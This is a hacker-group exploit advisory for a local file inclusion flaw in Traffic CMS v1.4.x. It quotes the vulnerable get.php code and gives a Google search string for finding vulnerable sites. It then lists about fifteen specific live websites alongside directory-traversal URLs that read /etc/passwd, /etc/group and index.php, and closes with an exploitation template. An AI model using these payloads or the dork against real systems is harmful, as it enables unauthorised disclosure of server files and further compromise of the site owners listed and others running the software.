.__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/
                         _____________________________ 
                        /   _____/\_   _____/\_   ___ \  
                        \_____  \  |    __)_ /    \  \/ 
                        /        \ |        \\     \____ 
                       /_______  //_______  / \______  /
                               \/         \/         \/           
Traffic CMS v1.4.x => Local File Inclusion Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com 
[~] Þeker Insanlar :  ZoRLu, ( milw00rm.com ), 
                      Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, d4rkvisuaL, BlackEdition
                      DaiMon, PRoMaX, alpican, EthicalHacker, BurakGrs, LordERROR
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Traffic CMS 
|~Affected Version : v1.4.x
|~Software  : http://www.trafficwebsites.co.uk/  - https://www.facebook.com/trafficwebsites
|~RISK : Medium
|~Google Keyword :  inurl:/admin/media/get.php ( developable )
|~Tested On : [L] Kali Linux \ [R] Example sites 
#################### INFO ################################
makes it possible to read all the files from the local base.
 #######################################################
 
### Error Line in 'get.php' ## 
<?php
$ssl = true;
$file = $_GET['f'];
$path = UL_PATH;
$docs = array('doc','docx','xls','xlsx','pdf','zip','txt','rtf','ppt','pptx');
if (file_exists($path.$file))
{
	$size = filesize($path.$file);
	$contents = file_get_contents($path.$file);
	$finfo = finfo_open(FILEINFO_MIME_TYPE);
	$mime = finfo_file($finfo,$path.$file);
	finfo_close($finfo);
	if(in_array(file_ext($file), $docs))
..

########################################################
Tested on;
http://www.uha.london/admin/media/get.php?f=../../etc/group
https://www.unlimitedshop.co.uk/admin/media/get.php?f=../../etc/group
https://www.unlimitedshop.co.uk/admin/media/get.php?f=../index.php     ()
http://www.ticktockrobot.co.uk/admin/media/get.php?f=../../etc/group
http://www.powerelectricservices.co.uk//admin/media/get.php?f=../../etc/group
http://www.knighthoodcorporate.com/admin/media/get.php?f=../../etc/group
http://www.nexusdp.co.uk/admin/media/get.php?f=../../etc/group
http://www.thespencepractice.co.uk/admin/media/get.php?f=../../etc/group
http://www.brightwell.fr/admin/media/get.php?f=../../../../../etc/passwd
http://www.brightwell.co.uk/admin/media/get.php?f=../../../../../etc/passwd
http://brightwell.es/admin/media/get.php?f=../../../../../etc/passwd
http://www.brightwell-inc.com/admin/media/get.php?f=../../../../../etc/passwd
http://www.talbottype.co.uk/admin/media/get.php?f=../../../../../etc/passwd  
http://www.talbottype.co.uk/admin/media/get.php?f=../index.php  
http://www.weddinginateacup.co.uk/admin/media/get.php?f=../../../etc/group
############################################################
Exploitation; http://$VICTIM/admin/media/get.php?f=[Local Path] 
############################################################